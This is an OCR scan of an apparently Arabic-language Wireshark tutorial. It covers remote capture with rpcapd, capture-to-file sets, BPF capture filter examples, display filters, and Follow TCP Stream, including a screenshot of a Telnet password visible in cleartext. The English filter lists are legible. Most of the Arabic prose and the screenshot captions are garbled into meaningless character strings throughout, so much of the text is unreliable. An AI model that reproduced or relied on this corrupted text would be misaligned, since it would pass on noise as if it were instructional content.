a** 1 £ 



0 [petals] 

□ [ 



Oo±t 



<JL^j] ^jj .Ajia &1I ^ * a I jl! J cjL* jIslxJI j>* ^ j^j^ ^ all 4Ajaii3l J jSjiL V Details 




Capture Traffic Remotely • 

^o ^ijJI Ai ixi^ixJI a£ jJJI ^Ijj 2^.1 j RSPAN. U^j cr^^j [remote SPAN] ^ switches 

j. Ultra VNC (free) ^ [target client] j^j ^ j^j^ ^Ja^l jj jo Jalisl^U iajjaij ^Ij jlrk 

axj jo ^j3I ^al jj j^ cj^Ij jo o jUo anyplace jLogmein 
j*j 'rpcapd.exe lUAj WinPcap .(Jj^j ( <j > ^^ t WinPcap axj jo LU^VI cjlj^a ^l^k^l U^l c^jSaj 

.WinPcap winPcap rpcapd.exe ^ 







Ptoom. McJ* ^wif »<n [8] 1 - 


1 1 (Art r***~of«o *v»<»«^ 


mm, 4 afl 

, m 
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.WinPcap J^i <|^t rpcaped.exe g-^j^l ^ jj^j ls* A^aliJI aia 4jajal* 
[authentication] 71 ajL& ^^Luj 7 UjI Jl jj^j -n u^) ^ c> Jj^j ( J^ [rpcapd-n] fjfc 

[Capture I Interface I options I manage interface I remote interface I add] 

.rpcap [rpcap daemon] JL-a37l ^ill < <j > ^^ t Jl^JI rpcapd [-1] ^l^i^l ,c*l jj! j 

irpCapd (j^ -W£Sl7l £c-aUjJ £x» ^^klLoixJl <xjj^a3l 

C:\>rpcapd [-b <address>] [-p <port>] [-6] [-1 <host_list>] [-a <host,port>] [-n] [-v] [-d] [-s <file>] [-f <file>] 



(Deal with TONS of Traffic) JJ^ ^ J <> fr* 6^ ^ 4- 

jjc. cilLlaJ (Jjc^j (_^i3l j AjuAi £JJJ c aLa till ciljjjj ciljUjjjl jll Jc JjJ>Jl (J-^ (LfcL^ ^ g ^ *j t^UaL^Jl t— iLuiuij^all <J^.ta 

,Cljl£jjaJl ^j-Q J J^ cffi^*^ 4_ijl£^l (jLajJal JjJ-aJl ^^P" *J^I dl7Ax-<Jl <J>Ajtj3l ^LlHj L_fl jjoj .LaLaJ 

Jc ^<Jl (J^axJ ^jj^aJ ^AkjjauJl (j-G t . llSaj ^aJ ^ j JJ^Jl Jalaullj t Aaj L_fl jjuoS tdlj Jj7l ^Aj^aJ £-IaJ (j-a un ^^JjoiaII <jl£ li] 

jll JalililU C-LoS <j7l gajli sJaJ ciL (j^aLkll ~ l^Lu^l J^S (j' t **\^J J^ -^-^71 J j.<U.>.nj L_fl jjoj .dujJjVI ^JjuJ 

J^Uli c^jS lit 

^>JI ^ JJii JjjL ^ .(Capture Filters) JalialVI jj^i ^l^ki^V t^U^Vl J^ai c> s^l j ^ c> j^ll t° J-^M 



bC >I ax^ Jalisll LISjIVI Jl jhilW .ajjouj Jl ^>JI cj Jj q\ t*ll (jimj Aa (Capture Filters) 1*12271 J^ ^l.^lmt 

(Capture to a File Set) ^ Jalfill OaJ Jal£NI aJ^p • 

,tiljUjjjj| jll a I laJLujI j 1 g > ^>^q 0^-^ j3l djliLJI J cJ^^ -^J File set .(File set) -^-^ L ^^)^ -^^lll a j£ (iljLujjjl J\ 

File I File Set I List Files 

Jalisll UajJ Jll(Interface) Jl s^^h £ Options h^j ^J*^^ <^^l J s^^JI Capture c3J J^ 

^a^j ^ . Jtill J£j^JI J jjj-g U£ ^Capture File(s) ^ J (File set) ( aLJ] L_aLJI ^1 j jLaiJI J^^j . jj>^l ^ 

^JjLJI l^LJI *L^V j^^JI j Use multiple files s-^h 
jl ^Haajuj liUi jll jjjIj^ .jAaJ ^3 .pcapng c3j >>i *^j 100 MB * flLall ^ j*^* ^UijU tiljUijjl jll ^Jj jjoj 4 11a U3Hg J 



[■^3 1 El 



L' mc-laycr header Prcrrv M;de Snaplen [B] Buffer j*.1BJ ■ - 



Capture flr. All idterfj 

f?1 Capture ill un 

C-a prbtwc: Filei't) 

Files c:\it»spiciou*\9irirty jpc. pcapng 

UiejcjuUipl*riteS V Us* g] 

y Mod filter cry 100 

k#04 file every 

EUng buffef with 
B Stop c*jrture Hter I 
S*op C«ptu<e 




JJp.d Jtd- lurt rjf packets in rcjl time 
Jdide c*c:Mre i^ro duiey 



Set Wlreshark to capture to 
file sets when you are- going 
to capture over along time 



^\ b ncble rj«t"^ 

I ^ EnableEran 



QiEtwark njTrit i-e-it-lLrtm-rv 
sport name rf jtion 
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Cascade Pilot • 

http://www.riverbed.com : j^-a^ll 

>La»a.l (JajuojI l^Jt-jjoi jj ^aJj <£jjaJl Cjlc Jjuj S^Lj J ^JC J^lj J^l UJ^ ^ (J j> aaJl ^^jll £f^l ClAiLa (jl 2007 ^ a 1 

.cAiLall £>i& I^I^jjojV aI&^g Stal SLa^ ^ n ciljLujjjl jll /^asLLJI > n jll j > *al V. 
.Cascade Pilot ls^'j g^iJI lWI WinPcap <*jt^> <Loris Degioanni <2009 ^ J 

^ (j£^2i Ls i^. J^\£jjj ;tiljUijj| jll J *^ jiLJI jjjliiillj ^ j^jjil <*-il j^S j^jjj tSjjuSlt £n&\ dial* ^Jlsu Cascade Pilot 

1 ^^ilojl ; j^VI jl^VI yi 6 cJULail Jc .s £±2ll CjUL J^UjII Jc s j^3l ^ Cascade Pilot's dt c> j 
tiljLujjjl jll (jli t^jjjlj ^cl jl j jl ^3^x11 jlila AiLjalj ^ j£j Sj* <J£ .tiljlujjjl jll (j* sIjjLUljc. 1,3 t ^jA-* 52j Aija^ 

(j* IP ci ilibLa^ o^j^ lSj^ v ^ 'Cascade Pilot J .l^l^l JLaxloa^U LaJL^a jjc. ^f^al tiljUijjl jll t aLall Jj^vi s^lcb ^jIj 



Htm r— f c^*j 



VMM 



' t> Tortuft- 1 # Kip 



-c 



> 



i 

i Qi n iii^ m i 

Q Phrkiai DaMutaP ■ i ■-' 




Jar 



I,- 



Cascade Pilot .^ajjall ^jjjII CjliLi ^ <J*l*jll ^ l^a. s^ia. c loJ liljUijjl jll .a^UJI ^ jjujjI! ^Uj j) & jj^UII (Jjjji^ j ^aacVI 

jdj (J^l£jj] j^VI ^fi^l daliLa ^ cJ-**^ pljuljj 

.cJla^ 6J li^U Cascade Pilot ^l^-U ^ 4 (MB 
(Reduce the Amount of Traffic You have to Work With) Ifck J^*U jj^aJ) 4£j^ <> JJiU) ^ 

.JalSSlVI ^UjI S J^lillj ^la . all 

(jAs«-xi ^ ^gjujLoJJ jl (j^J V (iljLujjjl jll jl ^aj ^3 tl^a. jxjuLq ^^La. C5 ic jl <juajoj^<JI Ja.b JJJ^ ^J^- JalSSl v ; laj jl£ lil 

_ jj^JI A^ja. 

jjj^J) SljU-4 djUi jjI j.1 ^jMnn V UHp L-Liiil • 

-dumpcap.exe c> jjj^^ ^j^j^'j 3 ' .jj^ iali^V dumpcap.exe 3^Hi ^J^^^ 

jj^Jl ^j^- 4-ia>j >n V tiSjLuSjjt jll jl v . ujuoj ^a.jVI ^^-Ic.) -LalijlVI 4jUr> e-Liil jjj-<JI ^j^- ^ c^^HJ ^ ^ ^ dumpcap 
.Ja^jVl ^j^l ^ ciljUijjIjll 31aJl iajj^ ^ lJj^ "Dropped: x" 4(aj51S a^j^j dumpcap 
V .aL&L Previous Segment j ACKed Lost Segment c> ^^1 ^ c# j 1 ^ ^ o- 3 ^^ <ta ^ a 4 C^ ^ ^ 

J JjS l^inks ^Ij Lliavi cUI ^U3I J1JJI .(Capture Filter) ilSslVI j^^i JIUI c^jll ja 11a 

^ jaJl (jl^a L-Uaal JjJaal ^J^aja ciL^ 64ia.jJl £>i& ^ JalSSlVI 6j2lfl J-al jC> (J^iaJ JiLa. (> .JalSSlVI ^ jaJl J^jj 

.(dropped packets) 
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libpcap/WtnPcap 
[capture filter] 



Use a capture 
filter to reduce 
the number of 
packets that get 
passed up to the 
Capture Engine 



network 



A£j* SIjU^a <U1aj V Spanned port • 

^jj^al hi cj^jjoj Lua jiailU .1^ J jxAa Spanned port ^^-^ ^Jc- JjlLJI ^j^jjoJI ^> LqaIo L-kajl ^— U' 

^ j) ^^W^ 1 j JL^jVL Ci*a j .h^ J Jj^a ^ spanned a physical switch port 

li^i ^jijjjjjaill Spanned port - jaJLuii £±i\j 1^ a1 jxjuLq 4£jJJI ci±jl£ hta .(oLaJVI cAAac < . ujmj lLuLUljc. 2 £-al jll 
.oversubscription £^jll I^a c^^J -f J*^' lP 3 *^ ^' t> o^j^ 1^' 1 <^j lP 3 ^ cS^jd ^j^ 

ACKed u>* ^aL&j jjoj tSbli tcilh ^ V^j o^Jj .^JLaJI -^j^ Dropped: x ^j^A^I j^ <3X*JI ^£ 

t*Ui j ^ jaJI (> (g\ JalJ <j1 Jl jjAj ^ j^l jll jj^ cj! Previous Segment j Lost Segment 

.tiljLujjjl jll ^1 ^ o-^j^l 
lU j* Full-duplex tap . jj^l ^£ -^^1 ^ ^ j jj) jj^ Jl ^Ijsj . Jaxj ^ o^j^l span capture *^l 
.TAP J*- -UiftVI jj^li 6 j^a o^xj ^ J I^Loj Intelligent Taps .J^l J^l ^ > ^ <4^l ^ ^ 




If a port-spanned switch 
can't keep up, consider 
using a full-duplex tap 



f (Capture Filter)^liUVl jfiti o^jfi UILoj uL£ • 
Options j^l c>j *^l Capture <ija j^I t> ^ (Capture Filter) JalitiVI 

JalislVI jj^a AlaJ ^ j^jj ^ill j Capture Filter c^*^ L - J ^ ^ < — * j ^ ^ * >1 a * j 

.^U3I Jlxill ^ jj^a U£ Edit Interface Settings SiaU ^ ^j^j U j ^ ^ j j <-J^ ^ > ^ > ^>^^l i 



■ 



tOill phii ruliattp KfMltf cAiMerf ddbbli 1 



Double-click anywhere on the 
dasirad irterfac* Eire la Dpar tha 
Edit Interface Setting* window 




£±& hi B t*L <^UJI LUttl VI jj^i ^\\<*A\ aS^l ^ill jlSJI ^ill j ^Edit Interface Settings siaU ^Ull Jiill 
BPF <i-i^ail ^^klaaj tiljUijjl jll .Capture Filter area AiSaio ^ aisSI <LLauj oA* a,A\\\ JalislVI jj^i 5juj^a 

.JalSslVI dumpcap cia <> Jj^is h^ .(Berkeley Packet Filtering) 



V -S^Vl jJ^la jl pi ^x^Jl Sjgkll jjJIj .ialSaVI JJ^a ^U^L <4 g nn1 <jl^3l ^UjI AjiLkll ^ ^^Sasu ^jUjjI jll jl jJVt j^J 

,^jia^3L!l jii!>la ^J-dlc AjUj^ C-LaAaajqal L^JJ jl ^ » ila ^ Uaa^ ^^^ic ^jlia JaliiilVI JJ^a ^jli t^a^jVI (^^ic m A aJl t ^11 1 g i£ <lj 
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| Ed il Interface Setfngf 



■-■if 



Ct»ft-urt 

Interface Ffeafe* PC* FE f«™iyO>*li9Uer ^Devwe'.NPF^efraFf CQFF79 -EEF F3MASS9F: 




http://wiki.wireshark.org/CaptureFilters -M jll SjLjj ^^^^ JalSslVI jj^li ^ CjUjkJI <> 

(MAC / IP) L^j^it lhU J^ jj>*« ^ • 

i jll A\h\ uiVl c _^a MAC ( IPu^j^* C>* ^ * jl) O^*-* IP L)' Jjj L>* JJJ - ^ -^-^ 

<KL> Jc j£ j£\ 

UjldLJ ^jj Jll staVt ^ill j <dumpcap ^JajJjj BPF 4 *j > ^ l ^vi >. n (JatftlVI j^) Capture filters 

11a IS^V 5j J l>jj j^i ^j^j J^j '(Display Filter) jfi^* Jat£i3V ^3 jL^jjIjII 4_LjujIjj 

.BPF <*^j dumpcap ^->lj^ :LkJjj j^&s v (Display Filter) lP 3 ^ .^JA^'jM 4_£L 

(Jjqjt^^l IP (jl -lat&lYI lW-C- ^l^klajl J j^flJ 4 Jj^al jjlt jjLjJaxll ^ ^jAslSI ^jj L-Ll^ (jl^-o J ialajlVI du£ lij 

.l^lil^J ^JjJ jll JJJ - ^ ^^P" L - J ^ 

.mask ^l.^nul j) CIDR ^-y^ Al.vViml cilj£ aj t^jUxJI ^ <c ^ ^ jl ^j^- Jalislt ajjj LqaIc- 



c±& lij Ul .multicastj broadcast ^£ Jl ^-*^YI ^ J^U. a£jj^I Jc^ u j^^ I CP ji^ u' 
Capture filters . Jlj^' ^ ip6j ip JalialVI j^la ^^ki^j j^i 4 jj^JI <> IPv6 jl^yi ji IP o$P*i ^ 

cjI j^VI -iajj^ Edit Capture Filters jjM j^^ .JalSsSVI jj^i c> <^al j^l ^ >^ u^^u ^J-^j^ ^ '.^ 

■ http://wiki.wireshark.org/SampleCaptures -M jil ^ J ^ ^ lS Jati^VI t> AiLjal ^V^^j ,t*S jUi jj! jll 

/ LjJa^SI MAC LS^\ ^^^1 pL^OJ 4t LljJa^SI J-d jl IPv6 J IPv4 U^J^ JJ>^^ Jali^ll ^JjJ U^JC- 

,L_fl^Jl L_flJjJa>Jl ASliA (JJ^ij Jc (il^ J^-J (j-a ^Slj cillil t^Jj^iall <J jia Jc JJjl^l ^3^'^ (J^ L>^ W%f^J 1VIAC U^JJJ ^^>^ ^ 



Cjp^ure 

t jplurt 




.t*L o-aUJI ci^JI d;: u<;ti V UDP ji TCP ^ Jj bUU JalislVI J^Lk 
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huu jjjkilt l_Lij*j J] £^ _ jjJaili ^ l_a j^h V (Berkeley Packet Filtering format) JaliilVI jfiti 
http://wiki.wireshark.org/CaptureFilters 

Port 53: Capture UDP/TCP traffic to or from port 53 (typically DNS traffic) 

Not port 53: Capture all UDP/TCP traffic except traffic to or from port 53 

- Port 80: Capture UDP/TCP traffic to or from port 80 (typically HTTP traffic) 

- UDP port 67: Capture UDP traffic to or from port 67 (typically DHCP traffic) 

TCP port 21: Capture TCP traffic to or from port 21 (typically the FTP command channel) 

- Portrange 1-80: Capture UDP/TCP traffic to or from ports from 1 through 80 

- TCP portrange 1-80: Capture TCP traffic to or from ports from 1 through 80 

,i>li^l (jjU* j& Lo£ 'logical operator 1 a$ \n ^^11 <J!La tAJtlLa iat-L<J! t * j> ^^>^ -^-^ La,ijc. 

- Port 20 or port 21: Capture all UDP/TCP traffic to or from port 20 or port 21 (typically FTP data 
and command ports) 

Host 10.3.1.1 and port 80: Capture UDP/TCP traffic to or from port 80 that is being sent to or from 
10.3.1.1 

- Host 10.3.1.1 and not port 80: Capture UDP/TCP traffic to or from 10.3.1.1 except traffic to or 
from port 80 

- UDP src port 68 and UDP dst port 67: Capture all UDP traffic from port 68 to port 67 (typically 
traffic sent from a DHCP client to a DHCP server) 

- UDP src port 67 and UDP dst port 68: Capture all UDP traffic from port 67 to port 68 (typically 
traffic sent from a DHCP server to a DHCP client) 

e I^L,u ^ ,TCP J-M ^ specific ASCII string JS* j£« :UU ^ li) ^ ^ 

(http://www.wireshark.org/tools/string-cf.html ) Wireshark's String-Matching Capture Filter Generator 
.0 ^1 jVI TCP f A* GET J 'HTTP GET -W^V ±& ^ J li! < ^ 

sj±^4 icmp jj^ ^ iaisai • 

t>Vl jt *bVl J Cj^II^ djj^ ^jc ajjSIj* 4^ Jj^Ajj* Internet Control Messaging Protocol (ICMP) 

JSaJI J] SjL^(Offset) ^1 j] r v ^" ,; ^ 6 ^ ^ .ICMP -XaUBJl jSte ^> jpJI JSja dL^I Jj^?J1 o^j 

.ICMP ^IjSI g&j* j* 1 ^IjVlj ICMP c> J^l> 0 ^IJV 1 .ICMP ^> 

- icmp: Capture all ICMP packets. 

- icmp[0]=8: Capture all ICMP Type 8 (Echo Request) packets. 

- icmp[0]=17: Capture all ICMP Type 17 (Address Mask Request) packets. 

- icmp[0]=8 or icmp[0]=0: Capture all ICMP Type 8 (Echo Request) packets or ICMP Type 0 (Echo 
Reply) packets. 

icmp[0]=3 and not icmp[l]=4: Capture all ICMP Type 3 (Destination Unreachable) packets except 
for ICMP Type 3/Code 4 (Fragmentation Needed and Don't Fragment was Set) packets 
j^jj ICMP c - ^ s-ic. jj ^jl tdjj J^i^ A\ ^jSI j ^not icmp JJisIVI ^ji L1j\ ^ ^c. jll ^^ic 
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Follow TCP Stream in Wireshark • 

s^&Luid a) staYl ^ ."Follow tcp stream" ^ jj*ua3I TCP l>* ^-^W^ l£j£ ^ ^j^j^ 

CjUUJI jl diilill J jjj^I CjUK *j 11a ^l^kiojl .(Application Layer) ciiLLfkiil <LJa Ji* (j^jUl <jj^ tcp data 

Follow tcp stream ^ i>j ^ JL-a3VI/ jt£ll <> ^>J1 i^lS ^ TCP 'TCP ^jj 

'EBCDIC 'ASCII Sjj^ 1 cs* W* 3 ^' *5 cMjJI ^jj cill ^ojoij -Uli ^ t^j U£ JmLn q^I J jliill ^ jl^ 

.Raw formats 'C Arrays 'HEX Dump 



F>it [44 fr> i*pn*t AjmVm %Mt*t* Tdtph«n^ Icdi l-tftrwit ttfp 

IH1IM J B X 3 A \ «■ t*Tl |H 5 €1 C 

j i > 

FiMh uv-4*v*n*flQ 

h*. Tito* iourt* CutwutfiQi P'cIk: 




k:: 



3 0.602972 

4 0. D041CO 

e 0.15O4G2 
7 0.1»Vd 

• o-jtiai* 

9 : : :.;o= ■ 

U 0.1^M4 

12 0>liH77 
U D.l»656 
14 0.1UG46 

11 r_: 3 *3ie 



192. 1*4.0.? 
102. 104. d. r 
103.161,0,1 
192.169.0.2 
192,161.0,2 
tU. L 44- 0,1 

192.169+0*2 
192.169.0.1 
192.168.0.1 
132.169.0,2 
192.1*8.0.1 
192. 16B. 0.1 



142.164.0. 1 
1« lflJO 1 
193, 16*, 0.2 
192.164.0.1 
192, 164. 0.1 
It? 164 0.7 
i>:. 164-0-2 
193,168-0.1 
19M6S.0.2 
192. 166. 0. 2 
132.1&B.Q.1 

192, JW, 0.3 




pi. *1ng.org:0. 0. 
OfriniBW/lfM (oaf) CrfyfjJj 



woo , 0*00. 

xter** color 



. . . b b 4. 

. . . #.biiL zittq cn-fl :0. 0 



TCP 
TELNET 
TELNET 

TCP 

TELNET 
rc fa 

TCLHCT 

TELNET 
TCP 

ILLHtl 
TELNET 
TCP 
TELNET 



BA 5m* Imqi- !■ > iilnt 
113 Ip'wt Data . 
69 Telnet Data * 
66 2m -in*qt-T« > telnet 
SO 1*1 IW I Data ... 
M r ri4i* H <ph- IrurjP-t 
Ql TO i*»t 0414 
IN T4lfWC Oat 4 
66 te' n*i > lB-1»«g«-l» 
B4 le" net Data ... 
75 Tenet Data ... 
66 telnet > k-iuqt 1 
» Te net Data ... 



Fran* 1: 74 bytai or win {592 bits}, w Uy_n& capture* LSOJ 61 
Ethernet II k Src; Lite Ont_.;b:bf :f a C«D ;flO:cc: : bf :f a] , !>st: WB£ternD_9f 
;ntrw Pf«OCQl vsrs^OoJ, SrtJ l«.16*.0.i ( 1 9J ■ 1 1 E ■ Q . J ) H 192.166. 
Tran3«1» on Ccrtrol Protocol . 5rc Pprt ! Jn-le^jge-la tlffO), PwEJ 



[Oooq go OA CO 4f aO 97 00 40 

0010 00 1c 46 tz 40 00 40 06 

0020 00 01 06 0* 00 1" 99 O 

C03D 7d i 4 0 ■] DC 00 02 04 

0040 2* 1* 00 00 OC 00 01 03 



ft jb of fa IHJ 4> 10 
73 1C CO 46 Of 0? tO 46 

ao «c oo oo co oo io o; 

OS W 04 02 Ofi OA 30 Vt 

03 00 



i: 



...... |,44t login: iJL NOV IT 10 '111' 

Of-tflOiO 2.6-0*™ (O0f> #4: TUtOn ^ 
mUoh to Cfwiascr Tha proictivsly 

please use the serdbugCi^ut fitly io rafl 

" rjf tn le 
, - ■fWli, p'. -_ 
*nOu0h irtfor*Ati** to repr«li^ce the profclc* is encl»»eO 



Password revealed 
in TCP Stream 



B*f'_ 
v*r>(wi 



ircDugLU my io l epon pugt Tn ltw systo. 

jt-j a buQ + please try to reprodkice it with the latest: 

urt thb" 
nd it 



r jj!" i L . r 

of the cod*, with buQ r epur I a « try io tansgrt thit 



kftOHT fix for It ixHes. incluaa xlun as n«T1 . 
1 /sb In/pirn mm. yahoo, too 

PImG m. yafoo. zoo ("204^1 . 2EXL6T) : S6 data bytes 
64 bytes fr^* 204.71. 200. «r : fcna.seq*6 itl-241 t1«-63.6IS « 
* tciw_Sfiq-l tt 1-2*1 t1»e-73. 591 iti 
lC-|)_*4q-J ttl-J41 tin*-71. 3*2 m 
TC«p_5*q-* TC 1-2*1 t1n*-7 3,493 «s 
Slikj_%^**J Ul»741 tW»73.0*6«> 
ung us-', icl-:*l C1"*- - 0,2J* US 



64 byt» fran 204. 71- 

6-1 byt« fro- 204. 71. 200-4^ 

*4 0yt4* rrc« 204,71200-67 

04 by lit Trxm 204.71. 200 -*7 

64 byt«4 fro* :•».«- 



■. N bycal 



- 



W6i Irirtf ASCII IBCDIl HaOump C Art*>^ W tr* 



((jaajxJ) jj^i Apply Display Filters to Focus on Specific Traffic 

o^ljS t :< ua ,(il3i C5 ic <£L<»V1 ^1 j& ^r^j^ JJ^y^ ^^>^ .^^^ cs"^ L$ jfi-^ 1 ^ CjlkifLlill - gaJ aLjujj JjJaal ^jLi^Vl 

V t^^kl aj^U ^j-<i ^^>^- cJ j 1 ^ frill <-U*^ ^ y^c- o^j 6 j^^^ ^ (Web Log)^-^^ ^^L^. dj^l^jaj 

Ajl*. jlill £yz Ly^l ^ J ' 6 ^ cJ jV s-Aj Ajc L_lA JJ j oA ^ J^-laJ ^3 tiljLoijjl jll # ^j^J laJjJallj J jg hj / . V^J 

Display Filter Area 





EiFe Edit Vww £a|rture £n*fyre 


StsliEtks TtfepfiCTTjr lods [«ter(rjls yelp 




■ . » it Of it B E X £ 




^, €t ®t □ a s 1 


Fihen [j.iddr- =10.1.1.1 


^ £xpiessien.„ 


Clear Apply Saw 





44 444 4 



, (^^joijj jl! CjI j^VI iaJjjai) ^pajaJl jJ^j/Cjl ^ ***'J^ ^Laijjj jjj^Jj ^jiajc aj j jl! 1 A^b J^Li. j-o m \ 

.((j^jxJI jj^li jjj^j j lP 3 ^ l^j^-I ^j^ 3 ) o^^I jj .2 

.(HxkJl (jC t ftjuj^llj ^liljll JIa£VI j ^ 1 ^alj) (J^J^I J^^ (J^J^ ^alo .3 

jxJI jj^li ^UijV tiL c_iAij ^1 Expression .5 
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7 
8 
9 



(Use Proper Display Filter Syntax) ^ li ^ t lhj^I 5^ ^l^^l • 




^jl^ ^ e ^iu£i (Display Filter) jBli jli <BPF II (Capture Filter) JJSsJV! j£W jlj^ ^ 
jj^la \^ a a jisi tiljUijjl jll jii^ii eUiLoL .(Wireshark proprietary format) ^j^j^ 



arp: Displays all ARP traffic including gratuitous ARPs, ARP requests, and ARP replies 

ip: Displays all IPv4 traffic including packets that have IPv4 headers embedded in them (such as 

ICMP destination unreachable packets that return the incoming IPv4 header after the ICMP header) 

ipv6: Displays all IPv6 traffic including IPv4 packets that have IPv6 headers embedded in them, 

such as 6to4, Teredo, and ISATAP traffic 

tcp: Displays all TCP-based communications 



- bootp: Displays all DHCP traffic (which is based on BOOTP). 

dns: Displays all DNS traffic including TCP-based zone transfers and the standard UDP-based DNS 
requests and responses 

tftp: Displays all TFTP (Trivial File Transfer Protocol) traffic 

http: Displays all HTTP commands, responses and data transfer packets, but does not display the 
TCP handshake packets, TCP ACK packets or TCP connection teardown packets 

- icmp: Displays all ICMP traffic 



bootp.option.hostname: Displays all DHCP traffic that contains a host name (DHCP is based on 
BOOTP) 

http.host: Displays all HTTP packets that have the HTTP host name field. This packet is sent by the 
clients when they send a request to a web server 

ftp.request.command: Displays all FTP traffic that contains a command, such as the USER, PASS, 
or RETR commands 



tcp.analysis.flags: Displays all packets that have any of the TCP analysis flags associated with 
them-this includes indications of packet loss, retransmissions, or zero window conditions 




(djllnkill ^ 4_ajU3! jj^i) Application Filters 



(JiaJI fjj 4_Ajli3! jj^la) Field Existence Filters 



pjj^Lkll <^jli3l jj^la) Characteristic Filters 



, https://www.facebook.com/tibea2004 



713 



tcp.analysis.zero_window: Displays packets that are flagged to indicate the sender has run out of 
receive buffer space 

jj^li jJ^ BPF (Jjninlt ^^klaiJ JaliSlVI jffllfl .JaliSlVI jfiti fl>lkU jA jia jsJl jJ^li J ^JC lc jJjuj Lk^JI 



.^Ij Cjij ^! jjuj a^. ^^ic ^jiajc j^lsj Jaliiill jiila I^js l!-^ <^i^ <SJalt Cj!^<JI ^> ^ <ilU& .proprietary a *_i> ^\ ~ laJLuxi ^pa^xJI 

-L pajc Jalijl! jilfl <jI£ 5-1 jjuj ^ C5 ic I^I^IujI (j^j icmp j ip < JUall c^c- 

£fll jJl jjJ -SajljjJ! 4i^>x-G Ajjj LoAlc JjJjSII jSlall jA I^A .CljjjjjVI £tij^aJ 3 mU ^ DNS JJ>* JSjuJI ^ 

DNS ^— ilj^ uilujl ^ <L^alc t . ujujj www.wireshark.org (_>^I^>*1uj1 <jl ^1 1 b£ a\ t jiilill 11a ^hviml .ciijjiijy 1 a£jjuj 



| http b^HAiMlDl.pcApng 



ta S k @ 



B r \ « • * 5 '4 : (HJH) 

|"?| Btpresuon... 



Q Q ^ EE til 























I 


0.000000 


24 


6,173 


220 


75 




75 


ms 


standard 


query 


0sc9bafi A www. w 


2 


Q,Q21&73 


75 


75.75, 


75 


24 


6,173 


120 


ms 


Standard 


query 


re&pon&e 0x9ba8 


3 


0.0O07&3 


24 


6.173, 


220 


75 


75.75 


75 


ows 


Standard 


query 


0x8920 AAAA wwi 


4 


0,030017 


24 


6.173, 


220 


75 


75,75 


75 


0W5 


standard 


query 


0x8920 AAAA wwi 


S 


0.005284 


75 


75.75.75 


24.6.173 


220 


DNS 


Standard 


query 


response 0x8920 


7 


0,009750 


75 


75,75, 


75 


24 


6,17 3. 


220 


DNS 


Standard 


query 


response 0x89201 


20 


0. 074579 


24 


6. 1? 3 


220 


75 


75, 75 


75 


DNS 


Standard 


query 


0xd42c A dmru2- 


2? 


0.001640 


24 


6,173. 


220 


75 


75.75 


75 


DNS 


Standard 


query 


Qxz&bl A ws.tf 


23 


0.000703 


24 




220 


75 


75- 75 


7Z> 


DNS 


Standard 


query 


0x4 caO A www . yi 


25 


0.011550 


75 


75.75, 


75 


24 


6,173 


220 


DNS 


Standard 


query 


response 0x4ca0 


26 


0.000774 


24 


6. 17 3 


220 


75 


75. 75 


75 


DNS 


Standard 


query 


OxbebS AAAA wwi 


27 


0.000044 


75 


75.75 


75 


24 


6.17? 


220 


DNS 


standard 


query 


response 0xe8b3 


28 


0.000693 


24 


6.173. 


220 


75 


75.75 


75 


LANS 


Standard 


query 


0x5843 AAAA ws 


36 


0.004906 


75 


75.75 


75 


24 


6.17 3 


220 


DNS 


Standard 


query 


response Oxd42c 


3S 


O.OOOS80 


24 


6_173. 


220 


75 


75. 75 


75 


DNS 


Standard 


query 


OxblOl AAAA dm 


42 


0.009530 


75 


75.75.75 


24 


6.173 


220 


DNS 


standard 


query 


response OxbebS 




n nmm 4 


T4r 


« i ? 




7 t 


-*K 


-7*. 











Q t ' f Jt * 'CL\tr«*_f lies- F-i^nq'-.htlp-hro'.vsel-Ol.pcapnq - ... fcKketi: 3011 Di5pla>ect 30S M*ifc*d: Q L... Prisfile Dt**u& 



(Use the Display Filter Error Detection Mechanism) >^ f Uaii <-LSS ^Jl ^l^l^l 

jj^li Alklo ^ ^^J-<^ tiljUjjjjl jll laJ L_S jjujS ^dnS DNS ClLa3 lil AjLaJ AjujIjuj^. ^jia^xJl jii^li jl j^ii 

. (logic test)(3^^^ V tiljLujjjl jl! .Ijia. ^ ^jSl j t^j^ >^ 

(Field name) Jji^t f Uyii 

JaaJ! AlaJ t Jia. ^xjujI Ai^x-<J .(http.hOSt J J^S^ 5-UujjI (^ic 4_ajUs (JjSj l^jjflaJJ ^ j£j c_fl jjuj ( ^j3I ^pa^xJl Jj!>li (j* ^J^xJl ^ jSj 

t5 lc. ji^U ^ jSj ^ jjuj 6 JUaII 11a -C5^^^ cJ^-^ ^ i (Status Bar)^-^ -^j^ ^-^jj o^j^ ^-^^ 

Request Method ^ Je. jfcll . f >ll J^Uj s > ^ HTTP 

.http.requestmethod l^ 1 liA c^ 1 (Status Bar)^JI u u <**>lt c> HTTP gJaLJI 



| htlr-U'tj-v^lOlp'.j^n-j 



£cHt Vi** 



ij«rtwrc AriityM £tlft*rti« lefcflho^ 

^^^^^ 



&qpf«Hiofiw„ Clear Apply Save 



+4.?- - T-rr.c 

0.O00853 
0.0 20101 
0.003404 
O. 001S70 
0.000662 



11 

12 

14 



Source 

24,6. 173. 220 
174. 137.42.75 
174. 137, 42.75 
174. 137_42. 75 
24.6. 173, 220 



174. 13?. 42. 75 HTTP 
24. 6.173. 220 TCP 
24.6.173.220 HTTP 
24.6.173. 220 HTTP 
174.137. 42. 7S TCP 



I Into 

GET / HTTP/1, 1 

http > 42 379 [ACKj Seq=l Ack= 
HTTP/1.1 200 OK [Un reassemble 
Cotitinuation or non-HTTP ti^f 
42379 > http [ACK] Seq=292 Ac 



i F^aBte 10: 345 bytes on wire C.2V60 E>its>. 345 bytes captured C2760 bits> 
s Ethernet II, Src : Hewl ett-_a7 : bf Cd4 :SS : 64 : a7 :bf : a3> K Ost : Cadant_3l 

ii Internet Protocol version 4 T src: 24,6,173,220 C24, 6, 173. 220> T Dst : 174 
- Transmission Control Protocol, Srt Port: 42379 (42379), Dst Port: ht.t:p 

Hypertext Transfer Protocol 
GET / HTTP/1. l\r\r* 

[Expert mfo Ccl^at/Sequence> : G£T / http/1 , l\r\n3 

]^ ' ' 
ntequ e st URI : 



on - 
bb 
13 



Request Version: HTTP 

Q -ff HTTP ftfcqjugrt. 




^of*t Default 



. JSaJI liA lsj^ j£\ ^>J^ AilS o^j*^ o^j*l\ jfi^ http.requestmethod lp^ 

^ 101 f j^J^ 2011 c# J 1 ^ -^J^ ^ liA 1 iqiVi 

.UjJ jSlill jjLks 
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JjLojjj <HTTP lUjj V s-ujSI ^1 ja. .HTTP c> ^ j-^UtJI U -j^- jSla jaju 11a 

.HTTP J^j 




41 
60 
61 
SO 
96 



119 0 
125 0 



.000000 
07846S 
.010247 
031927 
.000334 
.029517 
037100 
